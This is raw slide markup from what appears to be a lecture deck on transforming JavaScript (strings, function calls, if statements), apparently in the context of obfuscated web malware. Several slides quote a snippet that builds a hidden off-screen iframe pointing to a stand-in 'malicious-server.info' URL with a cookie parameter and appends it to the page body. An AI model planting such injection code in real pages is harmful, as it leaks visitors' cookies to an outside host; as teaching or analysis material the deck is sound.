              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"http_://malicious-server.info/?keyword=c71234b6f4a&amp;cookie=" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>+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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"&lt;div style='position:absolute;top:-1px;left:-1px;'&gt;&lt;iframe src='" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>+ x22q + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"'&gt;&lt;/iframe&gt;&lt;/div&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1">
              <a:solidFill>
                <a:schemeClr val="lt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    document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.body.appendChild(x22);</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522" name="Google Shape;522;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2802811" y="1589610"/>
            <a:ext cx="36576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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272678" y="1772545"/>
            <a:ext cx="420624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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6962695" y="1952849"/>
            <a:ext cx="128016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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1594303" y="1952849"/>
            <a:ext cx="466344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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271532" y="99290"/>
            <a:ext cx="8520600" cy="6735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SzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Transforming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, Function Calls, If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="Google Shape;527;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="3172968"/>
            <a:ext cx="3675887" cy="186204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528" name="Google Shape;528;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3132989"/>
            <a:ext cx="3291840" cy="192024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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-8157800">
            <a:off x="5413182" y="3157308"/>
            <a:ext cx="1165882" cy="1314357"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 65879"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>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0" name="Google Shape;530;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-8157800">
            <a:off x="5413182" y="3335486"/>
            <a:ext cx="1165882" cy="1314357"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 65879"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>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1" name="Google Shape;531;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-8157800">
            <a:off x="5413182" y="3524152"/>
            <a:ext cx="1165882" cy="1314357"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 65879"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>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2" name="Google Shape;532;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-8157800">
            <a:off x="5413182" y="3684565"/>
            <a:ext cx="1165882" cy="1314357"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 65879"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>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3" name="Google Shape;533;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6257742" y="4184792"/>
            <a:ext cx="1072225" cy="668676"/>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34" name="Google Shape;534;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7391207" y="3353968"/>
            <a:ext cx="1130701" cy="668676"/>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35" name="Google Shape;535;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0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="137160" y="822960"/>
            <a:ext cx="8789368" cy="39725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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"div"</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"http_://malicious-server.info/?keyword=c71234b6f4a&amp;cookie=" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>+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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"&lt;div style='position:absolute;top:-1px;left:-1px;'&gt;&lt;iframe src='" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>+ x22q +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"'&gt;&lt;/iframe&gt;&lt;/div&gt;"</a:t>
            </a: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    document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.body.appendChild(x22);</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541" name="Google Shape;541;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2802811" y="1589610"/>
            <a:ext cx="36576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50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272678" y="1772545"/>
            <a:ext cx="420624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50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6962695" y="1952849"/>
            <a:ext cx="128016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50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1594303" y="1952849"/>
            <a:ext cx="466344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50"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Function Calls, If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="Google Shape;546;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="3172968"/>
            <a:ext cx="3675887" cy="186204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547" name="Google Shape;547;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3132989"/>
            <a:ext cx="3291840" cy="192024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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="3172968"/>
            <a:ext cx="3675887" cy="186204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554" name="Google Shape;554;p51"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, Function Calls, If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Google Shape;555;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8789368" cy="228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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.body.appendChild(x22);</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556" name="Google Shape;556;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="158785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51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="175479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51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425"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51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164"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51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3132989"/>
            <a:ext cx="3291840" cy="192024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52"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Function Calls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Google Shape;567;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8789368" cy="39725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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.body.appendChild(x22);</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568" name="Google Shape;568;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2120876"/>
            <a:ext cx="2286000" cy="16459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569" name="Google Shape;569;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="158785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52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="175479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52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425"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52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164"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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="3172968"/>
            <a:ext cx="3675887" cy="186204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574" name="Google Shape;574;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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="2505456"/>
            <a:ext cx="3675887" cy="253915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A626A4"/>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580" name="Google Shape;580;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5547053" y="2687162"/>
            <a:ext cx="3383280" cy="685800"/>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581" name="Google Shape;581;p53"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Function Calls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582" name="Google Shape;582;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="19202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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.body.appendChild(x22);</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583" name="Google Shape;583;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2120876"/>
            <a:ext cx="2286000" cy="16459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584" name="Google Shape;584;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="158785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53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="175479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53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425"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53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164"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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="2505456"/>
            <a:ext cx="3675887" cy="253915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A626A4"/>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594" name="Google Shape;594;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5547053" y="2687162"/>
            <a:ext cx="3383280" cy="685800"/>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595" name="Google Shape;595;p54"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Function Calls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596" name="Google Shape;596;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="19202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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.body.appendChild(x22);</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597" name="Google Shape;597;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2120876"/>
            <a:ext cx="2286000" cy="16459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598" name="Google Shape;598;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="158785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54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="175479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54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425"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54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164"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54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602836" y="2838721"/>
            <a:ext cx="3305012" cy="182880"/>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3" name="Google Shape;603;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8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7104158" y="1976598"/>
            <a:ext cx="1368300" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="134" name="Google Shape;134;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6085094" y="2666844"/>
            <a:ext cx="914400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2233606" y="2666845"/>
            <a:ext cx="1097280" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225487" y="1628866"/>
            <a:ext cx="1105399" cy="598449"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
